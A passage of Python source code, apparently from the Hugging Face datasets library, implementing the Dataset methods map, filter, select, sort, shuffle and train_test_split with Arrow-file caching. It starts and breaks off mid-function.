List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False`\n                - `function(batch: Union[Dict[List], List[Any]], indices: List[int]) -> Union[Dict, Any]` if `batched=True` and `with_indices=True`\n                If no function is provided, default to identity function: lambda x: x\n            with_indices (`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`.\n            input_columns (`Optional[Union[str, List[str]]]`, defaults to `None`): The columns to be passed into `function` as\n                positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument.\n            batched (`bool`, defaults to `False`): Provide batch of examples to `function`\n            batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True`\n                `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`\n            drop_last_batch (`bool`, default: `False`): Whether a last batch smaller than the batch_size should be\n                dropped instead of being processed by the function.\n            remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping.\n                Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding\n                columns with names in `remove_columns`, these columns will be kept.\n            keep_in_memory (`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file.\n            load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the current computation from `function`\n                can be identified, use it instead of recomputing.\n            cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n                results of the computation instead of the automatically generated cache file name.\n            writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n                Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n            features (`Optional[datasets.Features]`, defaults to `None`): Use a specific Features to store the cache file\n                instead of the automatically generated one.\n            disable_nullable (`bool`, defaults to `False`): Disallow null values in the table.\n            fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function`\n            new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n                If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n            rank (`Optional[int]`, defaults to `None`): If specified, this is the process rank when doing multiprocessing\n            offset (`int`, defaults to 0): If specified, this is an offset applied to the indices passed to `function` if `with_indices=True`\n            update_data (`bool`, defaults to `True`): If False, no new arrow table will be created\n        \"\"\"\n        assert (\n            not keep_in_memory or cache_file_name is None\n        ), \"Please use either `keep_in_memory` or `cache_file_name` but not both.\"\n\n        not_verbose = bool(logger.getEffectiveLevel() > WARNING)\n\n        # Reduce logging to keep things readable in multiprocessing with tqdm\n        if rank is not None and get_verbosity() < WARNING:\n            set_verbosity_warning()\n        # Print at least one thing to fix tqdm in notebooks in multiprocessing\n        # see https://github.com/tqdm/tqdm/issues/485#issuecomment-473338308\n        if rank is not None and \"notebook\" in tqdm.__name__:\n            print(\" \", end=\"\", flush=True)\n\n        # Select the columns (arrow columns) to process\n        if remove_columns is not None and any(col not in self._data.column_names for col in remove_columns):\n            raise ValueError(\n                \"Column to remove {} not in the dataset. Current columns in the dataset: {}\".format(\n                    list(filter(lambda col: col not in self._data.column_names, remove_columns)),\n                    self._data.column_names,\n                )\n            )\n\n        if isinstance(input_columns, str):\n            input_columns = [input_columns]\n\n        if input_columns is not None:\n            for input_column in input_columns:\n                if input_column not in self._data.column_names:\n                    raise ValueError(\n                        \"Input column {} not in the dataset. Current columns in the dataset: {}\".format(\n                            input_column, self._data.column_names\n                        )\n                    )\n\n        if fn_kwargs is None:\n            fn_kwargs = dict()\n\n        # If we do batch computation but no batch size is provided, default to the full dataset\n        if batched and (batch_size is None or batch_size <= 0):\n            batch_size = self.num_rows\n\n        class NumExamplesMismatch(Exception):\n            pass\n\n        def apply_function_on_filtered_inputs(inputs, indices, check_same_num_examples=False, offset=0):\n            \"\"\" Utility to apply the function on a selection of columns. 
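Returns `None` when `update_data` is False, otherwise returns the inputs updated with the processed outputs. 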
\"\"\"\n fn_args = [inputs] if input_columns is None else [inputs[col] for col in input_columns]\n if offset == 0:\n effective_indices = indices\n else:\n effective_indices = [i + offset for i in indices] if isinstance(indices, list) else indices + offset\n processed_inputs = (\n function(*fn_args, effective_indices, **fn_kwargs) if with_indices else function(*fn_args, **fn_kwargs)\n )\n if not update_data:\n return None # Nothing to update, let's move on\n if remove_columns is not None:\n for column in remove_columns:\n inputs.pop(column)\n if self._format_type is not None:\n inputs = self._getitem(\n key=(indices if isinstance(indices, int) else slice(indices[0], indices[-1] + 1)),\n format_type=None,\n format_columns=None,\n format_kwargs=None,\n )\n if check_same_num_examples:\n input_num_examples = len(inputs[next(iter(inputs.keys()))])\n processed_inputs_num_examples = len(processed_inputs[next(iter(processed_inputs.keys()))])\n if input_num_examples != processed_inputs_num_examples:\n raise NumExamplesMismatch()\n inputs.update(processed_inputs)\n return inputs\n\n # Check if we've already cached this computation (indexed by a hash)\n if update_data and self._data_files:\n if cache_file_name is None:\n # we create a unique hash from the function, current dataset file and the mapping args\n cache_file_name = self._get_cache_file_path(new_fingerprint)\n if os.path.exists(cache_file_name) and load_from_cache_file:\n logger.warning(\"Loading cached processed dataset at %s\", cache_file_name)\n info = self.info.copy()\n info.features = features\n return Dataset.from_file(cache_file_name, info=info, split=self.split)\n\n # Prepare output buffer and batched writer in memory or on file if we update the table\n if update_data:\n if features is None:\n features = self.features\n update_features = True\n else:\n update_features = False\n if keep_in_memory or cache_file_name is None:\n buf_writer = pa.BufferOutputStream()\n tmp_file = None\n writer = ArrowWriter(\n features=features,\n stream=buf_writer,\n writer_batch_size=writer_batch_size,\n update_features=update_features,\n fingerprint=new_fingerprint,\n )\n else:\n buf_writer = None\n logger.info(\"Caching processed dataset at %s\", cache_file_name)\n tmp_file = tempfile.NamedTemporaryFile(\"wb\", dir=os.path.dirname(cache_file_name), delete=False)\n writer = ArrowWriter(\n features=features,\n path=tmp_file.name,\n writer_batch_size=writer_batch_size,\n update_features=update_features,\n fingerprint=new_fingerprint,\n )\n\n try:\n # Loop over single examples or batches and write to buffer/file if examples are to be updated\n pbar_iterable = self if not batched else range(0, len(self), batch_size)\n pbar_unit = \"ex\" if not batched else \"ba\"\n pbar_desc = \"#\" + str(rank) if rank is not None else None\n pbar = tqdm(pbar_iterable, disable=not_verbose, position=rank, unit=pbar_unit, desc=pbar_desc)\n if not batched:\n for i, example in enumerate(pbar):\n example = apply_function_on_filtered_inputs(example, i, offset=offset)\n if update_data:\n example = cast_to_python_objects(example)\n writer.write(example)\n else:\n for i in pbar:\n if drop_last_batch and i + batch_size > self.num_rows:\n continue\n batch = self[i : i + batch_size]\n indices = list(range(*(slice(i, i + batch_size).indices(self.num_rows)))) # Something simpler?\n try:\n batch = apply_function_on_filtered_inputs(\n batch, indices, check_same_num_examples=len(self.list_indexes()) > 0, offset=offset\n )\n except NumExamplesMismatch:\n raise 
DatasetTransformationNotAllowedError(\n \"Using `.map` in batched mode on a dataset with attached indexes is allowed only if it doesn't create or remove existing examples. You can first run `.drop_index() to remove your index and then re-add it.\"\n )\n if update_data:\n batch = cast_to_python_objects(batch)\n writer.write_batch(batch)\n if update_data:\n writer.finalize() # close_stream=bool(buf_writer is None)) # We only close if we are writing in a file\n except (Exception, KeyboardInterrupt):\n if update_data and tmp_file is not None:\n if os.path.exists(tmp_file.name):\n os.remove(tmp_file.name)\n raise\n\n if update_data and tmp_file is not None:\n shutil.move(tmp_file.name, cache_file_name)\n\n if update_data:\n # Create new Dataset from buffer or file\n info = self.info.copy()\n info.features = writer._features\n if buf_writer is None:\n return Dataset.from_file(cache_file_name, info=info, split=self.split)\n else:\n return Dataset.from_buffer(buf_writer.getvalue(), info=info, split=self.split)\n else:\n return self\n\n @transmit_format\n @fingerprint(inplace=False)\n def filter(\n self,\n function: Optional[Callable] = None,\n with_indices=False,\n input_columns: Optional[Union[str, List[str]]] = None,\n batch_size: Optional[int] = 1000,\n remove_columns: Optional[List[str]] = None,\n keep_in_memory: bool = False,\n load_from_cache_file: bool = True,\n cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n fn_kwargs: Optional[dict] = None,\n num_proc: Optional[int] = None,\n suffix_template: str = \"_{rank:05d}_of_{num_proc:05d}\",\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Apply a filter function to all the elements in the table in batches\n and update the table so that the dataset only includes examples according to the filter function.\n\n Args:\n function (`callable`): with one of the following signature:\n - `function(example: Union[Dict, Any]) -> bool` if `with_indices=False`\n - `function(example: Union[Dict, Any], indices: int) -> bool` if `with_indices=True`\n If no function is provided, default to an always True function: lambda x: True\n with_indices (`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`.\n input_columns (`Optional[Union[str, List[str]]]`, defaults to `None`): The columns to be passed into `function` as\n positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument.\n batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True`\n `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`\n remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping.\n Columns will be removed before updating the examples with the output of `function`, i.e. 
if `function` is adding\n columns with names in `remove_columns`, these columns will be kept.\n keep_in_memory (`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the current computation from `function`\n can be identified, use it instead of recomputing.\n cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n results of the computation instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function`\n num_proc (`Optional[int]`, defaults to `None`): Number of processes for multiprocessing. By default it doesn't\n use multiprocessing.\n suffix_template (`str`, defaults to \"_{rank:05d}_of_{num_proc:05d}\"): If cache_file_name is specified, then this suffix\n will be added at the end of the base name of each. For example, if cache_file_name is \"processed.arrow\", then for\n rank=1 and num_proc=4, the resulting file would be \"processed_00001_of_00004.arrow\" for the default suffix.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n if len(self.list_indexes()) > 0:\n raise DatasetTransformationNotAllowedError(\n \"Using `.filter` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.`\"\n )\n\n if function is None:\n function = lambda x: True # noqa: E731\n\n if isinstance(input_columns, str):\n input_columns = [input_columns]\n\n if input_columns is not None:\n for input_column in input_columns:\n if input_column not in self._data.column_names:\n raise ValueError(\n \"Input column {} not in the dataset. 
Current columns in the dataset: {}\".format(\n input_column, self._data.column_names\n )\n )\n\n if fn_kwargs is None:\n fn_kwargs = dict()\n fn_kwargs[\"input_columns\"] = input_columns\n\n # return map function\n return self.map(\n partial(map_function, function=function, with_indices=with_indices),\n batched=True,\n with_indices=with_indices,\n features=self.features,\n batch_size=batch_size,\n remove_columns=remove_columns,\n keep_in_memory=keep_in_memory,\n load_from_cache_file=load_from_cache_file,\n cache_file_name=cache_file_name,\n writer_batch_size=writer_batch_size,\n fn_kwargs=fn_kwargs,\n num_proc=num_proc,\n suffix_template=suffix_template,\n new_fingerprint=new_fingerprint,\n )\n\n @transmit_format\n @fingerprint(inplace=False)\n def flatten_indices(\n self,\n keep_in_memory: bool = False,\n cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n features: Optional[Features] = None,\n disable_nullable: bool = True,\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Create and cache a new Dataset by flattening the indices mapping.\n\n Args:\n keep_in_memory (`bool`, default: `False`): Keep the dataset in memory instead of writing it to a cache file.\n cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n results of the computation instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n features (`Optional[datasets.Features]`, default: `None`): Use a specific Features to store the cache file\n instead of the automatically generated one.\n disable_nullable (`bool`, default: `True`): Allow null values in the table.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n\n return self.map(\n batched=True, # for speed\n keep_in_memory=keep_in_memory,\n cache_file_name=cache_file_name,\n writer_batch_size=writer_batch_size,\n features=features,\n disable_nullable=disable_nullable,\n new_fingerprint=new_fingerprint,\n )\n\n def _new_dataset_with_indices(\n self,\n indices_cache_file_name: Optional[str] = None,\n indices_buffer: Optional[pa.Buffer] = None,\n fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\" Return a new Dataset obtained by adding indices (provided in indices_cache_file_name or in a buffer) to the current Dataset. 
\"\"\"\n\n assert (\n indices_cache_file_name is not None or indices_buffer is not None\n ), \"At least one of indices_cache_file_name or indices_buffer must be provided.\"\n\n assert fingerprint is not None, \"please specify a fingerprint for the dataset with indices\"\n data_files = self._data_files\n if indices_cache_file_name is not None:\n indices_mmap = pa.memory_map(indices_cache_file_name)\n if data_files is None:\n data_files = []\n indices_data_files = [{\"filename\": indices_cache_file_name}]\n else:\n indices_mmap = pa.BufferReader(indices_buffer)\n indices_data_files = None\n indices_f = pa.ipc.open_stream(indices_mmap)\n indices_pa_table = indices_f.read_all()\n\n # Return new Dataset object\n return Dataset(\n self._data,\n data_files=data_files,\n info=self.info,\n split=self.split,\n indices_table=indices_pa_table,\n indices_data_files=indices_data_files,\n fingerprint=fingerprint,\n inplace_history=self._inplace_history, # in-place transforms have to be kept as we kept the same data_files\n )\n\n @transmit_format\n @fingerprint(inplace=False)\n def select(\n self,\n indices: Iterable,\n keep_in_memory: bool = False,\n indices_cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Create a new dataset with rows selected following the list/array of indices.\n\n Args:\n `indices` (sequence, iterable, ndarray or Series): List or 1D-array of integer indices for indexing.\n `keep_in_memory` (`bool`, default: `False`): Keep the indices mapping in memory instead of writing it to a cache file.\n `indices_cache_file_name` (`Optional[str]`, default: `None`): Provide the name of a cache file to use to store the\n indices mapping instead of the automatically generated cache file name.\n `writer_batch_size` (`int`, default: `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n assert (\n not keep_in_memory or indices_cache_file_name is None\n ), \"Please use either `keep_in_memory` or `indices_cache_file_name` but not both.\"\n if len(self.list_indexes()) > 0:\n raise DatasetTransformationNotAllowedError(\n \"Using `.select` on a dataset with attached indexes is not allowed. 
You can first run `.drop_index()` to remove your index and then re-add it.\"\n            )\n\n        # If the array is empty we do nothing\n        if len(self) == 0:\n            return self\n\n        # Prepare the writer for our indices arrow table\n        if keep_in_memory or indices_cache_file_name is None:\n            buf_writer = pa.BufferOutputStream()\n            tmp_file = None\n            writer = ArrowWriter(\n                stream=buf_writer, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit=\"indices\"\n            )\n        else:\n            buf_writer = None\n            logger.info(\"Caching indices mapping at %s\", indices_cache_file_name)\n            tmp_file = tempfile.NamedTemporaryFile(\"wb\", dir=os.path.dirname(indices_cache_file_name), delete=False)\n            writer = ArrowWriter(\n                path=tmp_file.name, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit=\"indices\"\n            )\n\n        indices_array = pa.array(indices, type=pa.uint64())\n        # Check if we need to convert indices\n        if self._indices is not None:\n            if PYARROW_V0:\n                indices_array = pa.concat_tables(self._indices.slice(i.as_py(), 1) for i in indices_array).column(0)\n            else:\n                indices_array = self._indices.column(0).take(indices_array)\n\n        indices_table = pa.Table.from_arrays([indices_array], names=[\"indices\"])\n\n        try:\n            writer.write_table(indices_table)\n            writer.finalize()  # close_stream=bool(buf_writer is None))  # We only close if we are writing in a file\n        except (Exception, KeyboardInterrupt):\n            if tmp_file is not None:\n                if os.path.exists(tmp_file.name):\n                    os.remove(tmp_file.name)\n            raise\n\n        if tmp_file is not None:\n            shutil.move(tmp_file.name, indices_cache_file_name)\n\n        # Return new Dataset object\n        if buf_writer is None:\n            return self._new_dataset_with_indices(\n                indices_cache_file_name=indices_cache_file_name, fingerprint=new_fingerprint\n            )\n        else:\n            return self._new_dataset_with_indices(indices_buffer=buf_writer.getvalue(), fingerprint=new_fingerprint)\n\n    @transmit_format\n    @fingerprint(inplace=False)\n    def sort(\n        self,\n        column: str,\n        reverse: bool = False,\n        kind: Optional[str] = None,\n        keep_in_memory: bool = False,\n        load_from_cache_file: bool = True,\n        indices_cache_file_name: Optional[str] = None,\n        writer_batch_size: Optional[int] = 1000,\n        new_fingerprint: Optional[str] = None,\n    ) -> \"Dataset\":\n        \"\"\"Create a new dataset sorted according to a column.\n\n        Currently sorting according to a column name uses numpy sorting algorithm under the hood.\n        The column should thus be a numpy compatible type (in particular not a nested type).\n        This also means that the column used for sorting is fully loaded in memory (which should be fine in most cases).\n\n        Args:\n            column (`str`): column name to sort by.\n            reverse (`bool`, defaults to `False`): If True, sort by descending order rather than ascending.\n            kind (Optional `str`): Numpy algorithm for sorting selected in {‘quicksort’, ‘mergesort’, ‘heapsort’, ‘stable’},\n                The default is ‘quicksort’. Note that both ‘stable’ and ‘mergesort’ use timsort under the covers and, in general,\n                the actual implementation will vary with data type. 
The ‘mergesort’ option is retained for backwards compatibility.\n keep_in_memory (`bool`, defaults to `False`): Keep the sorted indices in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the sorted indices\n can be identified, use it instead of recomputing.\n indices_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n sorted indices instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n if len(self.list_indexes()) > 0:\n raise DatasetTransformationNotAllowedError(\n \"Using `.sort` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.\"\n )\n # If the array is empty we do nothing\n if len(self) == 0:\n return self\n\n # Check the column name\n if not isinstance(column, str) or column not in self._data.column_names:\n raise ValueError(\n \"Column '{}' not found in the dataset. Please provide a column selected in: {}\".format(\n column,\n self._data.column_names,\n )\n )\n\n # Check if we've already cached this computation (indexed by a hash)\n if self._data_files:\n if indices_cache_file_name is None:\n # we create a unique hash from the function, current dataset file and the mapping args\n indices_cache_file_name = self._get_cache_file_path(new_fingerprint)\n if os.path.exists(indices_cache_file_name) and load_from_cache_file:\n logger.warning(\"Loading cached sorted indices for dataset at %s\", indices_cache_file_name)\n return self._new_dataset_with_indices(\n fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name\n )\n\n column_data = self._getitem(\n column, format_type=\"numpy\", format_columns=None, output_all_columns=False, format_kwargs=None\n )\n indices = np.argsort(column_data, kind=kind)\n if reverse:\n indices = indices[::-1]\n\n return self.select(\n indices=indices,\n keep_in_memory=keep_in_memory,\n indices_cache_file_name=indices_cache_file_name,\n writer_batch_size=writer_batch_size,\n new_fingerprint=new_fingerprint,\n )\n\n @transmit_format\n @fingerprint(inplace=False, randomized_function=True)\n def shuffle(\n self,\n seed: Optional[int] = None,\n generator: Optional[np.random.Generator] = None,\n keep_in_memory: bool = False,\n load_from_cache_file: bool = True,\n indices_cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Create a new Dataset where the rows are shuffled.\n\n Currently shuffling uses numpy random generators.\n You can either supply a NumPy BitGenerator to use, or a seed to initiate NumPy's default random generator (PCG64).\n\n Args:\n seed (Optional `int`): A seed to initialize the default BitGenerator if ``generator=None``.\n If None, then fresh, unpredictable entropy will be pulled from the OS.\n If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state.\n generator (Optional `np.random.Generator`): Numpy random Generator to use to compute the 
permutation of the dataset rows.\n                If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy).\n            keep_in_memory (`bool`, defaults to `False`): Keep the shuffled indices in memory instead of writing it to a cache file.\n            load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the shuffled indices\n                can be identified, use it instead of recomputing.\n            indices_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n                shuffled indices instead of the automatically generated cache file name.\n            writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n                Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n            new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n                If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n        \"\"\"\n        if len(self.list_indexes()) > 0:\n            raise DatasetTransformationNotAllowedError(\n                \"Using `.shuffle` on a dataset with attached indexes is not allowed. You can first run `.drop_index()` to remove your index and then re-add it.\"\n            )\n        # If the array is empty we do nothing\n        if len(self) == 0:\n            return self\n\n        if seed is not None and generator is not None:\n            raise ValueError(\"Both `seed` and `generator` were provided. Please specify just one of them.\")\n\n        assert generator is None or isinstance(\n            generator, np.random.Generator\n        ), \"The provided generator must be an instance of numpy.random.Generator\"\n\n        if generator is None:\n            if seed is None:\n                seed = np.random.get_state()[1][0]\n                _ = np.random.random()  # do 1 step of rng\n            generator = np.random.default_rng(seed)\n\n        # Check if we've already cached this computation (indexed by a hash)\n        if self._data_files:\n            if indices_cache_file_name is None:\n                # we create a unique hash from the function, current dataset file and the mapping args\n                indices_cache_file_name = self._get_cache_file_path(new_fingerprint)\n            if os.path.exists(indices_cache_file_name) and load_from_cache_file:\n                logger.warning(\"Loading cached shuffled indices for dataset at %s\", indices_cache_file_name)\n                return self._new_dataset_with_indices(\n                    fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name\n                )\n\n        permutation = generator.permutation(len(self))\n\n        return self.select(\n            indices=permutation,\n            keep_in_memory=keep_in_memory,\n            indices_cache_file_name=indices_cache_file_name,\n            writer_batch_size=writer_batch_size,\n            new_fingerprint=new_fingerprint,\n        )\n\n    @transmit_format\n    @fingerprint(\n        inplace=False, randomized_function=True, fingerprint_names=[\"train_new_fingerprint\", \"test_new_fingerprint\"]\n    )\n    def train_test_split(\n        self,\n        test_size: Union[float, int, None] = None,\n        train_size: Union[float, int, None] = None,\n        shuffle: bool = True,\n        seed: Optional[int] = None,\n        generator: Optional[np.random.Generator] = None,\n        keep_in_memory: bool = False,\n        load_from_cache_file: bool = True,\n        train_indices_cache_file_name: Optional[str] = None,\n        test_indices_cache_file_name: Optional[str] = None,\n        writer_batch_size: Optional[int] = 1000,\n        train_new_fingerprint: Optional[str] = None,\n        test_new_fingerprint: Optional[str] = None,\n    ) -> \"DatasetDict\":\n        \"\"\"Return a dictionary (:obj:`datasets.DatasetDict`) with two random train and test subsets (`train` and `test` ``Dataset`` splits).\n        Splits are created from the dataset according to `test_size`, `train_size` and `shuffle`.\n\n        This method is similar to scikit-learn `train_test_split` with the omission of the stratified options.\n\n        Args:\n            test_size (Optional `float` or `int`): Size of the test split\n                If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split.\n                If int, represents the absolute number of test samples.\n                If None, the value is set to the complement of the train size.\n                If train_size is also None, it will be set to 0.25.\n            train_size (Optional `float` or `int`): Size of the train split\n                If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split.\n                If int, represents the absolute number of train samples.\n                If None, the value is automatically set to the complement of the test size.\n            shuffle (Optional `bool`, defaults to `True`): Whether or not to shuffle the data before splitting.\n            seed (Optional `int`): A seed to initialize the default BitGenerator if ``generator=None``.\n                If None, then fresh, unpredictable entropy will be pulled from the OS.\n                If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state.\n            generator (Optional `np.random.Generator`): Numpy random Generator to use to compute the permutation of the dataset rows.\n                If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy).\n            keep_in_memory (`bool`, defaults to `False`): Keep the splits indices in memory instead of writing it to a cache file.\n            load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the splits indices\n                can be identified, use it instead of recomputing.\n            train_indices_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n                train split indices instead of the automatically generated cache file name.\n            test_indices_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n                test split indices instead of the automatically generated cache file name.\n            writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n                Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n            train_new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the train set after transform.\n                If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n            test_new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the test set after transform.\n                If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n        \"\"\"\n        from .dataset_dict import DatasetDict  # import here because of circular dependency\n\n        if len(self.list_indexes()) > 0:\n            raise DatasetTransformationNotAllowedError(\n                \"Using `.train_test_split` on a dataset with attached indexes is not allowed. 
You can first run `.drop_index() to remove your index and then re-add it.\"\n )\n # If the array is empty we do nothing\n if len(self) == 0:\n return DatasetDict({\"train\": self, \"test\": self})\n\n if test_size is None and train_size is None:\n test_size = 0.25\n\n # Safety checks similar to scikit-learn's ones.\n # (adapted from https://github.com/scikit-learn/scikit-learn/blob/fd237278e895b42abe8d8d09105cbb82dc2cbba7/sklearn/model_selection/_split.py#L1750)\n n_samples = len(self)\n if (\n isinstance(test_size, int)\n and (test_size >= n_samples or test_size <= 0)\n or isinstance(test_size, float)\n and (test_size <= 0 or test_size >= 1)\n ):\n raise ValueError(\n f\"test_size={test_size} should be either positive and smaller \"\n f\"than the number of samples {n_samples} or a float in the (0, 1) range\"\n )\n\n if (\n isinstance(train_size, int)\n and (train_size >= n_samples or train_size <= 0)\n or isinstance(train_size, float)\n and (train_size <= 0 or train_size >= 1)\n ):\n raise ValueError(\n f\"train_size={train_size} should be either positive and smaller \"\n f\"than the number of samples {n_samples} or a float in the (0, 1) range\"\n )\n\n if train_size is not None and not isinstance(train_size, (int, float)):\n raise ValueError(f\"Invalid value for train_size: {train_size} of type {type(train_size)}\")\n if test_size is not None and not isinstance(test_size, (int, float)):\n raise ValueError(f\"Invalid value for test_size: {test_size} of type {type(test_size)}\")\n\n if isinstance(train_size, float) and isinstance(test_size, float) and train_size + test_size > 1:\n raise ValueError(\n f\"The sum of test_size and train_size = {train_size + test_size}, should be in the (0, 1)\"\n \" range. Reduce test_size and/or train_size.\"\n )\n\n if isinstance(test_size, float):\n n_test = ceil(test_size * n_samples)\n elif isinstance(test_size, int):\n n_test = float(test_size)\n\n if isinstance(train_size, float):\n n_train = floor(train_size * n_samples)\n elif isinstance(train_size, int):\n n_train = float(train_size)\n\n if train_size is None:\n n_train = n_samples - n_test\n elif test_size is None:\n n_test = n_samples - n_train\n\n if n_train + n_test > n_samples:\n raise ValueError(\n f\"The sum of train_size and test_size = {n_train + n_test}, \"\n \"should be smaller than the number of \"\n f\"samples {n_samples}. Reduce test_size and/or \"\n \"train_size.\"\n )\n\n n_train, n_test = int(n_train), int(n_test)\n\n if n_train == 0:\n raise ValueError(\n f\"With n_samples={n_samples}, test_size={test_size} and train_size={train_size}, the \"\n \"resulting train set will be empty. 
Adjust any of the \"\n \"aforementioned parameters.\"\n )\n\n if generator is None and shuffle is True:\n if seed is None:\n seed = np.random.get_state()[1][0]\n _ = np.random.random() # do 1 step of rng\n generator = np.random.default_rng(seed)\n\n # Check if we've already cached this computation (indexed by a hash)\n if self._data_files:\n if train_indices_cache_file_name is None or test_indices_cache_file_name is None:\n # we create a unique hash from the function, current dataset file and the mapping args\n\n if train_indices_cache_file_name is None:\n train_indices_cache_file_name = self._get_cache_file_path(train_new_fingerprint)\n if test_indices_cache_file_name is None:\n test_indices_cache_file_name = self._get_cache_file_path(test_new_fingerprint)\n if (\n os.path.exists(train_indices_cache_file_name)\n and os.path.exists(test_indices_cache_file_name)\n and load_from_cache_file\n ):\n logger.warning(\n \"Loading cached split indices for dataset at %s and %s\",\n train_indices_cache_file_name,\n test_indices_cache_file_name,\n )\n return DatasetDict(\n {\n \"train\": self._new_dataset_with_indices(\n fingerprint=train_new_fingerprint, indices_cache_file_name=train_indices_cache_file_name\n ),\n \"test\": self._new_dataset_with_indices(\n fingerprint=test_new_fingerprint, indices_cache_file_name=test_indices_cache_file_name\n ),\n }\n )\n\n if not shuffle:\n train_indices = np.arange(n_train)\n test_indices = np.arange(n_train, n_train + n_test)\n else:\n # random partition\n permutation = generator.permutation(len(self))\n test_indices = permutation[:n_test]\n train_indices = permutation[n_test : (n_test + n_train)]\n\n train_split = self.select(\n indices=train_indices,\n keep_in_memory=keep_in_memory,\n indices_cache_file_name=train_indices_cache_file_name,\n writer_batch_size=writer_batch_size,\n new_fingerprint=train_new_fingerprint,\n )\n test_split = self.select(\n indices=test_indices,\n keep_in_memory=keep_in_memory,\n indices_cache_file_name=test_indices_cache_file_name,\n writer_batch_size=writer_batch_size,\n 